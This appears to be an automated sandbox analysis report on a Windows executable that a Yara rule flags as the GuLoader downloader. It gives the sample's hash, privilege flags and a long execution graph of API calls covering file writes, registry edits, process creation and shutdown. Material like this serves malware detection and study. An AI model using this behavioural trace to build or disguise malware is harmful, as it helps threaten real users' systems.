                                                    File size:540'745 bytes
                                                    MD5 hash:0EECC852B848039DA55141FB43DD01E2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1367001967.00000000055DB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:09:38:51
                                                    Start date:10/01/2025
                                                    Path:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\fTSt7dc60O.exe"
                                                    Imagebase:0x400000
                                                    File size:540'745 bytes
                                                    MD5 hash:0EECC852B848039DA55141FB43DD01E2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2484621112.000000000219B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:20.1%
                                                      Dynamic/Decrypted Code Coverage:13.8%
                                                      Signature Coverage:18.6%
                                                      Total number of Nodes:1528
                                                      Total number of Limit Nodes:41
                                                      execution_graph 4942 10001000 4945 1000101b 4942->4945 4952 10001516 4945->4952 4947 10001020 4948 10001024 4947->4948 4949 10001027 GlobalAlloc 4947->4949 4950 1000153d 3 API calls 4948->4950 4949->4948 4951 10001019 4950->4951 4954 1000151c 4952->4954 4953 10001522 4953->4947 4954->4953 4955 1000152e GlobalFree 4954->4955 4955->4947 4956 401d41 GetDC GetDeviceCaps 4957 402b1d 18 API calls 4956->4957 4958 401d5f MulDiv ReleaseDC 4957->4958 4959 402b1d 18 API calls 4958->4959 4960 401d7e 4959->4960 4961 405f6a 18 API calls 4960->4961 4962 401db7 CreateFontIndirectW 4961->4962 4963 4024e8 4962->4963 4007 403cc2 4008 403e15 4007->4008 4009 403cda 4007->4009 4010 403e26 GetDlgItem GetDlgItem 4008->4010 4019 403e66 4008->4019 4009->4008 4011 403ce6 4009->4011 4014 40419a 19 API calls 4010->4014 4012 403cf1 SetWindowPos 4011->4012 4013 403d04 4011->4013 4012->4013 4016 403d21 4013->4016 4017 403d09 ShowWindow 4013->4017 4018 403e50 SetClassLongW 4014->4018 4015 403ec0 4025 403e10 4015->4025 4077 4041e6 4015->4077 4021 403d43 4016->4021 4022 403d29 DestroyWindow 4016->4022 4017->4016 4023 40140b 2 API calls 4018->4023 4019->4015 4024 401389 2 API calls 4019->4024 4027 403d48 SetWindowLongW 4021->4027 4028 403d59 4021->4028 4026 404123 4022->4026 4023->4019 4029 403e98 4024->4029 4026->4025 4035 404154 ShowWindow 4026->4035 4027->4025 4032 403e02 4028->4032 4033 403d65 GetDlgItem 4028->4033 4029->4015 4034 403e9c SendMessageW 4029->4034 4030 40140b 2 API calls 4048 403ed2 4030->4048 4031 404125 DestroyWindow EndDialog 4031->4026 4096 404201 4032->4096 4036 403d95 4033->4036 4037 403d78 SendMessageW IsWindowEnabled 4033->4037 4034->4025 4035->4025 4040 403da2 4036->4040 4041 403db5 4036->4041 4042 403de9 SendMessageW 4036->4042 4051 403d9a 4036->4051 4037->4025 4037->4036 4039 405f6a 18 API calls 4039->4048 4040->4042 4040->4051 4045 403dd2 4041->4045 4046 403dbd 4041->4046 4042->4032 4044 40419a 19 API calls 4044->4048 4050 40140b 2 API calls 4045->4050 4090 40140b 4046->4090 4047 403dd0 4047->4032 4048->4025 4048->4030 4048->4031 4048->4039 4048->4044 4068 404065 DestroyWindow 4048->4068 4080 40419a 4048->4080 4052 403dd9 4050->4052 4093 404173 4051->4093 4052->4032 4052->4051 4054 403f4d GetDlgItem 4055 403f62 4054->4055 4056 403f6a ShowWindow KiUserCallbackDispatcher 4054->4056 4055->4056 4083 4041bc KiUserCallbackDispatcher 4056->4083 4058 403f94 EnableWindow 4061 403fa8 4058->4061 4059 403fad GetSystemMenu EnableMenuItem SendMessageW 4060 403fdd SendMessageW 4059->4060 4059->4061 4060->4061 4061->4059 4084 4041cf SendMessageW 4061->4084 4085 405f48 lstrcpynW 4061->4085 4064 40400b lstrlenW 4065 405f6a 18 API calls 4064->4065 4066 404021 SetWindowTextW 4065->4066 4086 401389 4066->4086 4068->4026 4069 40407f CreateDialogParamW 4068->4069 4069->4026 4070 4040b2 4069->4070 4071 40419a 19 API calls 4070->4071 4072 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4071->4072 4073 401389 2 API calls 4072->4073 4074 404103 4073->4074 4074->4025 4075 40410b ShowWindow 4074->4075 4076 4041e6 SendMessageW 4075->4076 4076->4026 4078 4041fe 4077->4078 4079 4041ef SendMessageW 4077->4079 4078->4048 4079->4078 4081 405f6a 18 API calls 4080->4081 4082 4041a5 SetDlgItemTextW 4081->4082 4082->4054 4083->4058 4084->4061 4085->4064 4088 401390 4086->4088 4087 4013fe 4087->4048 4088->4087 4089 4013cb MulDiv SendMessageW 4088->4089 4089->4088 4091 401389 2 API calls 4090->4091 4092 401420 4091->4092 4092->4051 4094 404180 SendMessageW 4093->4094 4095 40417a 4093->4095 4094->4047 4095->4094 4097 404219 GetWindowLongW 4096->4097 4098 4042a2 4096->4098 4097->4098 4099 40422a 4097->4099 4098->4025 4100 404239 GetSysColor 4099->4100 4101 40423c 4099->4101 4100->4101 4102 404242 SetTextColor 4101->4102 4103 40424c SetBkMode 4101->4103 4102->4103 4104 404264 GetSysColor 4103->4104 4105 40426a 4103->4105 4104->4105 4106 404271 SetBkColor 4105->4106 4107 40427b 4105->4107 4106->4107 4107->4098 4108 404295 CreateBrushIndirect 4107->4108 4109 40428e DeleteObject 4107->4109 4108->4098 4109->4108 4964 401a42 4965 402b1d 18 API calls 4964->4965 4966 401a48 4965->4966 4967 402b1d 18 API calls 4966->4967 4968 4019f0 4967->4968 4969 402746 4970 402741 4969->4970 4970->4969 4971 402756 FindNextFileW 4970->4971 4972 4027a8 4971->4972 4973 402761 4971->4973 4975 405f48 lstrcpynW 4972->4975 4975->4973 4976 401cc6 4977 402b1d 18 API calls 4976->4977 4978 401cd9 SetWindowLongW 4977->4978 4979 4029c7 4978->4979 4253 401dc7 4261 402b1d 4253->4261 4255 401dcd 4256 402b1d 18 API calls 4255->4256 4257 401dd6 4256->4257 4258 401de8 EnableWindow 4257->4258 4259 401ddd ShowWindow 4257->4259 4260 4029c7 4258->4260 4259->4260 4262 405f6a 18 API calls 4261->4262 4263 402b31 4262->4263 4263->4255 4980 401bca 4981 402b1d 18 API calls 4980->4981 4982 401bd1 4981->4982 4983 402b1d 18 API calls 4982->4983 4984 401bdb 4983->4984 4985 401beb 4984->4985 4986 402b3a 18 API calls 4984->4986 4987 401bfb 4985->4987 4988 402b3a 18 API calls 4985->4988 4986->4985 4989 401c06 4987->4989 4990 401c4a 4987->4990 4988->4987 4992 402b1d 18 API calls 4989->4992 4991 402b3a 18 API calls 4990->4991 4994 401c4f 4991->4994 4993 401c0b 4992->4993 4995 402b1d 18 API calls 4993->4995 4996 402b3a 18 API calls 4994->4996 4997 401c14 4995->4997 4998 401c58 FindWindowExW 4996->4998 4999 401c3a SendMessageW 4997->4999 5000 401c1c SendMessageTimeoutW 4997->5000 5001 401c7a 4998->5001 4999->5001 5000->5001 4286 4014cb 4287 4051f2 25 API calls 4286->4287 4288 4014d2 4287->4288 5002 40194b 5003 402b1d 18 API calls 5002->5003 5004 401952 5003->5004 5005 402b1d 18 API calls 5004->5005 5006 40195c 5005->5006 5007 402b3a 18 API calls 5006->5007 5008 401965 5007->5008 5009 401979 lstrlenW 5008->5009 5014 4019b5 5008->5014 5010 401983 5009->5010 5010->5014 5015 405f48 lstrcpynW 5010->5015 5012 40199e 5013 4019ab lstrlenW 5012->5013 5012->5014 5013->5014 5015->5012 5016 4024cc 5017 402b3a 18 API calls 5016->5017 5018 4024d3 5017->5018 5021 405bb4 GetFileAttributesW CreateFileW 5018->5021 5020 4024df 5021->5020 5022 40164d 5023 402b3a 18 API calls 5022->5023 5024 401653 5023->5024 5025 40628b 2 API calls 5024->5025 5026 401659 5025->5026 5027 4019cf 5028 402b3a 18 API calls 5027->5028 5029 4019d6 5028->5029 5030 402b3a 18 API calls 5029->5030 5031 4019df 5030->5031 5032 4019e6 lstrcmpiW 5031->5032 5033 4019f8 lstrcmpW 5031->5033 5034 4019ec 5032->5034 5033->5034 5035 401e51 5036 402b3a 18 API calls 5035->5036 5037 401e57 5036->5037 5038 4051f2 25 API calls 5037->5038 5039 401e61 5038->5039 5040 4056c3 2 API calls 5039->5040 5041 401e67 5040->5041 5042 401ec6 CloseHandle 5041->5042 5043 401e77 WaitForSingleObject 5041->5043 5045 402793 5041->5045 5042->5045 5044 401e89 5043->5044 5046 401e9b GetExitCodeProcess 5044->5046 5047 4062eb 2 API calls 5044->5047 5048 401eb8 5046->5048 5049 401ead 5046->5049 5050 401e90 WaitForSingleObject 5047->5050 5048->5042 5052 405e8f wsprintfW 5049->5052 5050->5044 5052->5048 4345 401752 4346 402b3a 18 API calls 4345->4346 4347 401759 4346->4347 4348 401781 4347->4348 4349 401779 4347->4349 4401 405f48 lstrcpynW 4348->4401 4400 405f48 lstrcpynW 4349->4400 4352 40177f 4356 4061dc 5 API calls 4352->4356 4353 40178c 4354 405993 3 API calls 4353->4354 4355 401792 lstrcatW 4354->4355 4355->4352 4361 40179e 4356->4361 4357 40628b 2 API calls 4357->4361 4358 4017da 4359 405b8f 2 API calls 4358->4359 4359->4361 4361->4357 4361->4358 4362 4017b0 CompareFileTime 4361->4362 4363 401870 4361->4363 4366 405f48 lstrcpynW 4361->4366 4371 405f6a 18 API calls 4361->4371 4381 401847 4361->4381 4384 405bb4 GetFileAttributesW CreateFileW 4361->4384 4402 405724 4361->4402 4362->4361 4364 4051f2 25 API calls 4363->4364 4367 40187a 4364->4367 4365 4051f2 25 API calls 4383 40185c 4365->4383 4366->4361 4385 403062 4367->4385 4369 4018a1 SetFileTime 4372 4018b3 CloseHandle 4369->4372 4371->4361 4373 4018c4 4372->4373 4372->4383 4374 4018c9 4373->4374 4375 4018dc 4373->4375 4376 405f6a 18 API calls 4374->4376 4377 405f6a 18 API calls 4375->4377 4378 4018d1 lstrcatW 4376->4378 4379 4018e4 4377->4379 4378->4379 4382 405724 MessageBoxIndirectW 4379->4382 4381->4365 4381->4383 4382->4383 4384->4361 4386 403072 SetFilePointer 4385->4386 4387 40308e 4385->4387 4386->4387 4406 40317d GetTickCount 4387->4406 4390 405c37 ReadFile 4391 4030ae 4390->4391 4392 40317d 43 API calls 4391->4392 4399 40188d 4391->4399 4393 4030c5 4392->4393 4394 4030d5 4393->4394 4395 40313f ReadFile 4393->4395 4393->4399 4397 405c37 ReadFile 4394->4397 4398 403108 WriteFile 4394->4398 4394->4399 4395->4399 4397->4394 4398->4394 4398->4399 4399->4369 4399->4372 4400->4352 4401->4353 4403 405739 4402->4403 4404 405785 4403->4404 4405 40574d MessageBoxIndirectW 4403->4405 4404->4361 4405->4404 4407 4032e7 4406->4407 4408 4031ac 4406->4408 4409 402d1a 33 API calls 4407->4409 4419 40330f SetFilePointer 4408->4419 4415 403095 4409->4415 4411 4031b7 SetFilePointer 4417 4031dc 4411->4417 4415->4390 4415->4399 4416 403271 WriteFile 4416->4415 4416->4417 4417->4415 4417->4416 4418 4032c8 SetFilePointer 4417->4418 4420 4032f9 4417->4420 4423 4063ee 4417->4423 4430 402d1a 4417->4430 4418->4407 4419->4411 4421 405c37 ReadFile 4420->4421 4422 40330c 4421->4422 4422->4417 4424 406413 4423->4424 4427 40641b 4423->4427 4424->4417 4425 4064a2 GlobalFree 4426 4064ab GlobalAlloc 4425->4426 4426->4424 4426->4427 4427->4424 4427->4425 4427->4426 4428 406522 GlobalAlloc 4427->4428 4429 406519 GlobalFree 4427->4429 4428->4424 4428->4427 4429->4428 4431 402d43 4430->4431 4432 402d2b 4430->4432 4434 402d53 GetTickCount 4431->4434 4435 402d4b 4431->4435 4433 402d34 DestroyWindow 4432->4433 4438 402d3b 4432->4438 4433->4438 4437 402d61 4434->4437 4434->4438 4445 4062eb 4435->4445 4439 402d96 CreateDialogParamW ShowWindow 4437->4439 4440 402d69 4437->4440 4438->4417 4439->4438 4440->4438 4449 402cfe 4440->4449 4442 402d77 wsprintfW 4443 4051f2 25 API calls 4442->4443 4444 402d94 4443->4444 4444->4438 4446 406308 PeekMessageW 4445->4446 4447 406318 4446->4447 4448 4062fe DispatchMessageW 4446->4448 4447->4438 4448->4446 4450 402d0d 4449->4450 4451 402d0f MulDiv 4449->4451 4450->4451 4451->4442 4452 402253 4453 402261 4452->4453 4454 40225b 4452->4454 4456 402b3a 18 API calls 4453->4456 4459 40226f 4453->4459 4455 402b3a 18 API calls 4454->4455 4455->4453 4456->4459 4457 40227d 4458 402b3a 18 API calls 4457->4458 4461 402286 WritePrivateProfileStringW 4458->4461 4459->4457 4460 402b3a 18 API calls 4459->4460 4460->4457 5067 402454 5068 402c44 19 API calls 5067->5068 5069 40245e 5068->5069 5070 402b1d 18 API calls 5069->5070 5071 402467 5070->5071 5072 40248b RegEnumValueW 5071->5072 5073 40247f RegEnumKeyW 5071->5073 5074 402793 5071->5074 5072->5074 5075 4024a4 RegCloseKey 5072->5075 5073->5075 5075->5074 5077 401ed4 5078 402b3a 18 API calls 5077->5078 5079 401edb 5078->5079 5080 40628b 2 API calls 5079->5080 5081 401ee1 5080->5081 5082 401ef2 5081->5082 5084 405e8f wsprintfW 5081->5084 5084->5082 4475 4022d5 4476 402305 4475->4476 4477 4022da 4475->4477 4479 402b3a 18 API calls 4476->4479 4478 402c44 19 API calls 4477->4478 4480 4022e1 4478->4480 4481 40230c 4479->4481 4482 4022eb 4480->4482 4486 402322 4480->4486 4487 402b7a RegOpenKeyExW 4481->4487 4483 402b3a 18 API calls 4482->4483 4485 4022f2 RegDeleteValueW RegCloseKey 4483->4485 4485->4486 4488 402c0e 4487->4488 4492 402ba5 4487->4492 4488->4486 4489 402bcb RegEnumKeyW 4490 402bdd RegCloseKey 4489->4490 4489->4492 4493 4062b2 3 API calls 4490->4493 4491 402c02 RegCloseKey 4495 402bf1 4491->4495 4492->4489 4492->4490 4492->4491 4494 402b7a 3 API calls 4492->4494 4496 402bed 4493->4496 4494->4492 4495->4488 4496->4495 4497 402c1d RegDeleteKeyW 4496->4497 4497->4495 4505 4014d7 4506 402b1d 18 API calls 4505->4506 4507 4014dd Sleep 4506->4507 4509 4029c7 4507->4509 4721 40335a #17 SetErrorMode OleInitialize 4722 4062b2 3 API calls 4721->4722 4723 40339d SHGetFileInfoW 4722->4723 4796 405f48 lstrcpynW 4723->4796 4725 4033c8 GetCommandLineW 4797 405f48 lstrcpynW 4725->4797 4727 4033da GetModuleHandleW 4728 4033f4 4727->4728 4729 4059c0 CharNextW 4728->4729 4730 403402 CharNextW 4729->4730 4738 403414 4730->4738 4731 403516 4732 40352a GetTempPathW 4731->4732 4798 403326 4732->4798 4734 403542 4735 403546 GetWindowsDirectoryW lstrcatW 4734->4735 4736 40359c DeleteFileW 4734->4736 4739 403326 11 API calls 4735->4739 4806 402dbc GetTickCount GetModuleFileNameW 4736->4806 4737 4059c0 CharNextW 4737->4738 4738->4731 4738->4737 4744 403518 4738->4744 4741 403562 4739->4741 4741->4736 4743 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4741->4743 4742 4035b0 4750 4059c0 CharNextW 4742->4750 4779 403653 4742->4779 4791 403663 4742->4791 4746 403326 11 API calls 4743->4746 4890 405f48 lstrcpynW 4744->4890 4749 403594 4746->4749 4749->4736 4749->4791 4762 4035cf 4750->4762 4752 403772 4755 403815 ExitProcess 4752->4755 4760 4062b2 3 API calls 4752->4760 4753 40367c 4754 405724 MessageBoxIndirectW 4753->4754 4756 40368a ExitProcess 4754->4756 4757 403692 lstrcatW lstrcmpiW 4764 4036ae CreateDirectoryW SetCurrentDirectoryW 4757->4764 4757->4791 4758 40362d 4763 405a9b 18 API calls 4758->4763 4761 403785 4760->4761 4765 4062b2 3 API calls 4761->4765 4762->4757 4762->4758 4766 403639 4763->4766 4767 4036d1 4764->4767 4768 4036c6 4764->4768 4769 40378e 4765->4769 4766->4791 4891 405f48 lstrcpynW 4766->4891 4903 405f48 lstrcpynW 4767->4903 4902 405f48 lstrcpynW 4768->4902 4772 4062b2 3 API calls 4769->4772 4774 403797 4772->4774 4776 4037b5 4774->4776 4784 4037a5 GetCurrentProcess 4774->4784 4775 403648 4892 405f48 lstrcpynW 4775->4892 4780 4062b2 3 API calls 4776->4780 4778 405f6a 18 API calls 4781 403710 DeleteFileW 4778->4781 4836 40391f 4779->4836 4782 4037ec 4780->4782 4783 40371d CopyFileW 4781->4783 4793 4036df 4781->4793 4785 403801 ExitWindowsEx 4782->4785 4788 40380e 4782->4788 4783->4793 4784->4776 4785->4755 4785->4788 4786 403766 4789 405de2 40 API calls 4786->4789 4787 405de2 40 API calls 4787->4793 4790 40140b 2 API calls 4788->4790 4789->4791 4790->4755 4893 40382d 4791->4893 4792 405f6a 18 API calls 4792->4793 4793->4778 4793->4786 4793->4787 4793->4792 4795 403751 CloseHandle 4793->4795 4904 4056c3 CreateProcessW 4793->4904 4795->4793 4796->4725 4797->4727 4799 4061dc 5 API calls 4798->4799 4800 403332 4799->4800 4801 40333c 4800->4801 4802 405993 3 API calls 4800->4802 4801->4734 4803 403344 CreateDirectoryW 4802->4803 4907 405be3 4803->4907 4911 405bb4 GetFileAttributesW CreateFileW 4806->4911 4808 402dff 4835 402e0c 4808->4835 4912 405f48 lstrcpynW 4808->4912 4810 402e22 4811 4059df 2 API calls 4810->4811 4812 402e28 4811->4812 4913 405f48 lstrcpynW 4812->4913 4814 402e33 GetFileSize 4815 402f34 4814->4815 4833 402e4a 4814->4833 4816 402d1a 33 API calls 4815->4816 4817 402f3b 4816->4817 4819 402f77 GlobalAlloc 4817->4819 4817->4835 4915 40330f SetFilePointer 4817->4915 4818 4032f9 ReadFile 4818->4833 4821 402f8e 4819->4821 4820 402fcf 4822 402d1a 33 API calls 4820->4822 4825 405be3 2 API calls 4821->4825 4822->4835 4824 402f58 4826 4032f9 ReadFile 4824->4826 4828 402f9f CreateFileW 4825->4828 4829 402f63 4826->4829 4827 402d1a 33 API calls 4827->4833 4830 402fd9 4828->4830 4828->4835 4829->4819 4829->4835 4914 40330f SetFilePointer 4830->4914 4832 402fe7 4834 403062 46 API calls 4832->4834 4833->4815 4833->4818 4833->4820 4833->4827 4833->4835 4834->4835 4835->4742 4837 4062b2 3 API calls 4836->4837 4838 403933 4837->4838 4839 403939 4838->4839 4840 40394b 4838->4840 4925 405e8f wsprintfW 4839->4925 4841 405e15 3 API calls 4840->4841 4842 40397b 4841->4842 4844 40399a lstrcatW 4842->4844 4846 405e15 3 API calls 4842->4846 4845 403949 4844->4845 4916 403bf5 4845->4916 4846->4844 4849 405a9b 18 API calls 4850 4039cc 4849->4850 4851 403a60 4850->4851 4853 405e15 3 API calls 4850->4853 4852 405a9b 18 API calls 4851->4852 4854 403a66 4852->4854 4855 4039fe 4853->4855 4856 403a76 LoadImageW 4854->4856 4857 405f6a 18 API calls 4854->4857 4855->4851 4860 403a1f lstrlenW 4855->4860 4864 4059c0 CharNextW 4855->4864 4858 403b1c 4856->4858 4859 403a9d RegisterClassW 4856->4859 4857->4856 4863 40140b 2 API calls 4858->4863 4861 403ad3 SystemParametersInfoW CreateWindowExW 4859->4861 4862 403b26 4859->4862 4865 403a53 4860->4865 4866 403a2d lstrcmpiW 4860->4866 4861->4858 4862->4791 4867 403b22 4863->4867 4868 403a1c 4864->4868 4870 405993 3 API calls 4865->4870 4866->4865 4869 403a3d GetFileAttributesW 4866->4869 4867->4862 4872 403bf5 19 API calls 4867->4872 4868->4860 4871 403a49 4869->4871 4873 403a59 4870->4873 4871->4865 4874 4059df 2 API calls 4871->4874 4875 403b33 4872->4875 4926 405f48 lstrcpynW 4873->4926 4874->4865 4877 403bc2 4875->4877 4878 403b3f ShowWindow LoadLibraryW 4875->4878 4881 4052c5 5 API calls 4877->4881 4879 403b65 GetClassInfoW 4878->4879 4880 403b5e LoadLibraryW 4878->4880 4882 403b79 GetClassInfoW RegisterClassW 4879->4882 4883 403b8f DialogBoxParamW 4879->4883 4880->4879 4884 403bc8 4881->4884 4882->4883 4885 40140b 2 API calls 4883->4885 4886 403be4 4884->4886 4887 403bcc 4884->4887 4885->4862 4888 40140b 2 API calls 4886->4888 4887->4862 4889 40140b 2 API calls 4887->4889 4888->4862 4889->4862 4890->4732 4891->4775 4892->4779 4894 403848 4893->4894 4895 40383e CloseHandle 4893->4895 4896 403852 CloseHandle 4894->4896 4897 40385c 4894->4897 4895->4894 4896->4897 4928 40388a 4897->4928 4900 4057d0 71 API calls 4901 40366c OleUninitialize 4900->4901 4901->4752 4901->4753 4902->4767 4903->4793 4905 4056f2 CloseHandle 4904->4905 4906 4056fe 4904->4906 4905->4906 4906->4793 4908 405bf0 GetTickCount GetTempFileNameW 4907->4908 4909 405c26 4908->4909 4910 403358 4908->4910 4909->4908 4909->4910 4910->4734 4911->4808 4912->4810 4913->4814 4914->4832 4915->4824 4917 403c09 4916->4917 4927 405e8f wsprintfW 4917->4927 4919 403c7a 4920 405f6a 18 API calls 4919->4920 4921 403c86 SetWindowTextW 4920->4921 4922 403ca2 4921->4922 4923 4039aa 4921->4923 4922->4923 4924 405f6a 18 API calls 4922->4924 4923->4849 4924->4922 4925->4845 4926->4851 4927->4919 4929 403898 4928->4929 4930 40389d FreeLibrary GlobalFree 4929->4930 4931 403861 4929->4931 4930->4930 4930->4931 4931->4900 5092 40155b 5093 40296d 5092->5093 5096 405e8f wsprintfW 5093->5096 5095 402972 5096->5095 5097 4038dd 5098 4038e8 5097->5098 5099 4038ec 5098->5099 5100 4038ef GlobalAlloc 5098->5100 5100->5099 5101 40165e 5102 402b3a 18 API calls 5101->5102 5103 401665 5102->5103 5104 402b3a 18 API calls 5103->5104 5105 40166e 5104->5105 5106 402b3a 18 API calls 5105->5106 5107 401677 MoveFileW 5106->5107 5108 401683 5107->5108 5109 40168a 5107->5109 5111 401423 25 API calls 5108->5111 5110 40628b 2 API calls 5109->5110 5113 402197 5109->5113 5112 401699 5110->5112 5111->5113 5112->5113 5114 405de2 40 API calls 5112->5114 5114->5108 3946 4023e0 3957 402c44 3946->3957 3948 4023ea 3961 402b3a 3948->3961 3951 4023fe RegQueryValueExW 3952 40241e 3951->3952 3956 402424 RegCloseKey 3951->3956 3952->3956 3967 405e8f wsprintfW 3952->3967 3953 402793 3956->3953 3958 402b3a 18 API calls 3957->3958 3959 402c5d 3958->3959 3960 402c6b RegOpenKeyExW 3959->3960 3960->3948 3962 402b46 3961->3962 3968 405f6a 3962->3968 3965 4023f3 3965->3951 3965->3953 3967->3956 3984 405f77 3968->3984 3969 4061c2 3970 402b67 3969->3970 4002 405f48 lstrcpynW 3969->4002 3970->3965 3986 4061dc 3970->3986 3972 40602a GetVersion 3972->3984 3973 406190 lstrlenW 3973->3984 3974 405f6a 10 API calls 3974->3973 3978 4060a5 GetSystemDirectoryW 3978->3984 3979 4060b8 GetWindowsDirectoryW 3979->3984 3980 4061dc 5 API calls 3980->3984 3981 405f6a 10 API calls 3981->3984 3982 406131 lstrcatW 3982->3984 3983 4060ec SHGetSpecialFolderLocation 3983->3984 3985 406104 SHGetPathFromIDListW CoTaskMemFree 3983->3985 3984->3969 3984->3972 3984->3973 3984->3974 3984->3978 3984->3979 3984->3980 3984->3981 3984->3982 3984->3983 3995 405e15 RegOpenKeyExW 3984->3995 4000 405e8f wsprintfW 3984->4000 4001 405f48 lstrcpynW 3984->4001 3985->3984 3987 4061e9 3986->3987 3989 406252 CharNextW 3987->3989 3990 40625f 3987->3990 3993 40623e CharNextW 3987->3993 3994 40624d CharNextW 3987->3994 4003 4059c0 3987->4003 3988 406264 CharPrevW 3988->3990 3989->3987 3989->3990 3990->3988 3991 406285 3990->3991 3991->3965 3993->3987 3994->3989 3996 405e89 3995->3996 3997 405e49 RegQueryValueExW 3995->3997 3996->3984 3998 405e6a RegCloseKey 3997->3998 3998->3996 4000->3984 4001->3984 4002->3970 4004 4059c6 4003->4004 4005 4059dc 4004->4005 4006 4059cd CharNextW 4004->4006 4005->3987 4006->4004 5115 401ce5 GetDlgItem GetClientRect 5116 402b3a 18 API calls 5115->5116 5117 401d17 LoadImageW SendMessageW 5116->5117 5118 401d35 DeleteObject 5117->5118 5119 4029c7 5117->5119 5118->5119 5120 405166 5121 405176 5120->5121 5122 40518a 5120->5122 5124 4051d3 5121->5124 5125 40517c 5121->5125 5123 405192 IsWindowVisible 5122->5123 5131 4051a9 5122->5131 5123->5124 5126 40519f 5123->5126 5127 4051d8 CallWindowProcW 5124->5127 5128 4041e6 SendMessageW 5125->5128 5133 404abc SendMessageW 5126->5133 5130 405186 5127->5130 5128->5130 5131->5127 5138 404b3c 5131->5138 5134 404b1b SendMessageW 5133->5134 5135 404adf GetMessagePos ScreenToClient SendMessageW 5133->5135 5136 404b13 5134->5136 5135->5136 5137 404b18 5135->5137 5136->5131 5137->5134 5147 405f48 lstrcpynW 5138->5147 5140 404b4f 5148 405e8f wsprintfW 5140->5148 5142 404b59 5143 40140b 2 API calls 5142->5143 5144 404b62 5143->5144 5149 405f48 lstrcpynW 5144->5149 5146 404b69 5146->5124 5147->5140 5148->5142 5149->5146 5150 4042e8 lstrlenW 5151 404307 5150->5151 5152 404309 WideCharToMultiByte 5150->5152 5151->5152 5160 100018a9 5161 100018cc 5160->5161 5162 100018ff GlobalFree 5161->5162 5163 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5161->5163 5162->5163 5164 10001272 2 API calls 5163->5164 5165 10001a87 GlobalFree GlobalFree 5164->5165 4267 40206a 4268 402b3a 18 API calls 4267->4268 4269 402071 4268->4269 4270 402b3a 18 API calls 4269->4270 4271 40207b 4270->4271 4272 402b3a 18 API calls 4271->4272 4273 402084 4272->4273 4274 402b3a 18 API calls 4273->4274 4275 40208e 4274->4275 4276 402b3a 18 API calls 4275->4276 4277 402098 4276->4277 4278 4020ac CoCreateInstance 4277->4278 4279 402b3a 18 API calls 4277->4279 4282 4020cb 4278->4282 4279->4278 4281 402197 4282->4281 4283 401423 4282->4283 4284 4051f2 25 API calls 4283->4284 4285 401431 4284->4285 4285->4281 5166 40156b 5167 401584 5166->5167 5168 40157b ShowWindow 5166->5168 5169 401592 ShowWindow 5167->5169 5170 4029c7 5167->5170 5168->5167 5169->5170 5171 404b6e GetDlgItem GetDlgItem 5172 404bc0 7 API calls 5171->5172 5181 404dd9 5171->5181 5173 404c63 DeleteObject 5172->5173 5174 404c56 SendMessageW 5172->5174 5175 404c6c 5173->5175 5174->5173 5176 404ca3 5175->5176 5180 405f6a 18 API calls 5175->5180 5178 40419a 19 API calls 5176->5178 5177 404ebd 5179 404f69 5177->5179 5190 404f16 SendMessageW 5177->5190 5211 404dcc 5177->5211 5182 404cb7 5178->5182 5184 404f73 SendMessageW 5179->5184 5185 404f7b 5179->5185 5186 404c85 SendMessageW SendMessageW 5180->5186 5181->5177 5183 404e4a 5181->5183 5188 404abc 5 API calls 5181->5188 5189 40419a 19 API calls 5182->5189 5183->5177 5192 404eaf SendMessageW 5183->5192 5184->5185 5187 404fa4 5185->5187 5193 404f94 5185->5193 5194 404f8d ImageList_Destroy 5185->5194 5186->5175 5196 405113 5187->5196 5214 404b3c 4 API calls 5187->5214 5218 404fdf 5187->5218 5188->5183 5195 404cc5 5189->5195 5197 404f2b SendMessageW 5190->5197 5190->5211 5191 404201 8 API calls 5198 40515f 5191->5198 5192->5177 5193->5187 5199 404f9d GlobalFree 5193->5199 5194->5193 5200 404d9a GetWindowLongW SetWindowLongW 5195->5200 5208 404d15 SendMessageW 5195->5208 5210 404d94 5195->5210 5212 404d51 SendMessageW 5195->5212 5213 404d62 SendMessageW 5195->5213 5201 405125 ShowWindow GetDlgItem ShowWindow 5196->5201 5196->5211 5205 404f3e 5197->5205 5199->5187 5202 404db3 5200->5202 5201->5211 5203 404dd1 5202->5203 5204 404db9 ShowWindow 5202->5204 5223 4041cf SendMessageW 5203->5223 5222 4041cf SendMessageW 5204->5222 5209 404f4f SendMessageW 5205->5209 5208->5195 5209->5179 5210->5200 5210->5202 5211->5191 5212->5195 5213->5195 5214->5218 5215 4050e9 InvalidateRect 5215->5196 5216 4050ff 5215->5216 5224 4049d6 5216->5224 5217 40500d SendMessageW 5221 405023 5217->5221 5218->5217 5218->5221 5220 405097 SendMessageW SendMessageW 5220->5221 5221->5215 5221->5220 5222->5211 5223->5181 5225 4049f3 5224->5225 5226 405f6a 18 API calls 5225->5226 5227 404a28 5226->5227 5228 405f6a 18 API calls 5227->5228 5229 404a33 5228->5229 5230 405f6a 18 API calls 5229->5230 5231 404a64 lstrlenW wsprintfW SetDlgItemTextW 5230->5231 5231->5196 5232 4024ee 5233 4024f3 5232->5233 5234 40250c 5232->5234 5235 402b1d 18 API calls 5233->5235 5236 402512 5234->5236 5237 40253e 5234->5237 5242 4024fa 5235->5242 5238 402b3a 18 API calls 5236->5238 5239 402b3a 18 API calls 5237->5239 5240 402519 WideCharToMultiByte lstrlenA 5238->5240 5241 402545 lstrlenW 5239->5241 5240->5242 5241->5242 5243 402793 5242->5243 5244 402567 WriteFile 5242->5244 5244->5243 5245 4045ee 5246 404624 5245->5246 5247 4045fe 5245->5247 5249 404201 8 API calls 5246->5249 5248 40419a 19 API calls 